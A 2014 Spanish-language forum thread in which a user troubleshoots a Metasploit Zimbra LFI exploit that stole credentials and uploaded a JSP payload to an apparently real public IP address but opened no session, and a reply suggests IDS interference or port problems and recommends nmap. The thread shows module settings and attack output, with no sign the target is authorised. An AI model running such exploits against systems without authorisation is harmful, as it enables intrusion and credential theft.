comment
IRC Chat
play_arrow
Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

[SOLUCIONADO] Metasploit - Exploit zimbra

  • 1 Respuestas
  • 2086 Vistas

0 Usuarios y 2 Visitantes están viendo este tema.

Desconectado Gyprus

  • *
  • Underc0der
  • Mensajes: 2
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
« en: Junio 13, 2014, 12:34:33 pm »
Exploit: exploit/unix/webapp/zimbra_lfi

RHOST: la ip al que voy a "atacar"
LHOST: ip local de la maquina virtual
puertos: Default RPORT : 7071 y Local: 4444

Y lo que me pasa es esto:

  • 200..x.xx.x.x:7071 - Getting login credentials...
  • 200.xx.xxx.xx:7071 - Got login credentials!
  • 200.xx.x.xx.x:7071 - Getting auth token...
  • 200.xx.x.xxx:7071 - Got auth token!
  • 200.xx.xx.x.x.x:7071 - Uploading payload
  • 200.xx.x.x.xx:7071 - Uploading jsp stager
  • 200.xx.xx.x.x:7071 - Executing payload on /downloads/dwZUmvrbqpKCV.jsp
  • [!] This exploit may require manual cleanup of '../jetty/webapps/zimbra/downloads/dwZUmvrbqpKCV.jsp' on the target
    [!] This exploit may require manual cleanup of '../jetty/webapps/zimbra/downloads/nCFqzvYjOAFiS' on the target
    msf exploit(zimbra_lfi) >

    Y que ahí supuestamente tendria que salir la session pero eso no pasa. Creo que puede ser un error de puertos ,dmz o bien el host no es vuln. Ayuda? :P Desde ya muchas gracias
« Última modificación: Septiembre 02, 2014, 04:07:13 pm por Expermicid »

Desconectado Snifer

  • *
  • Underc0der
  • Mensajes: 1439
  • Actividad:
    0%
  • Reputación 1
  • Snifer@L4b's
    • Ver Perfil
    • Snifer@L4bs
  • Twitter: sniferl4bs
« Respuesta #1 en: Junio 14, 2014, 04:35:57 pm »
Que te hace creer que el servidor es Vulnerable?

Puede andar de por medio algun amiguito IDS, IPS el cual esta obstruyendo, como tambien el puerto :) le pasaste un nmap o alguna herramienta parecida, para identificar puertos vulnerablidades?

Regards,
Snifer
No tienes permisos para ver links. Registrate o Entra con tu cuenta


Llaman traidor a la persona que evito que caiga el foro, gente bruta!



 

¿Te gustó el post? COMPARTILO!



[SOLUCIONADO] ¿Kali Linux o Kali Linux Ligth ?

Iniciado por worq

Respuestas: 2
Vistas: 6082
Último mensaje Noviembre 21, 2017, 12:28:54 pm
por Codig0Bit
[SOLUCIONADO] ¿Como publicar un software como software libre?

Iniciado por FuriosoJack

Respuestas: 2
Vistas: 1528
Último mensaje Mayo 23, 2017, 07:24:22 am
por HATI
[SOLUCIONADO] Multiuploader de imagenes con mysql, hosting de imagenes con mysql

Iniciado por graphixx

Respuestas: 4
Vistas: 2114
Último mensaje Marzo 26, 2013, 05:42:58 pm
por Xt3mP
[SOLUCIONADO] Linux Mint, errores, errores y mas errores...

Iniciado por n1sendev

Respuestas: 12
Vistas: 2646
Último mensaje Noviembre 22, 2017, 06:50:55 am
por RuidosoBSD
[SOLUCIONADO] Problem al instalar Windows "cualquier windows"

Iniciado por Made

Respuestas: 7
Vistas: 2877
Último mensaje Septiembre 03, 2012, 04:53:08 pm
por Made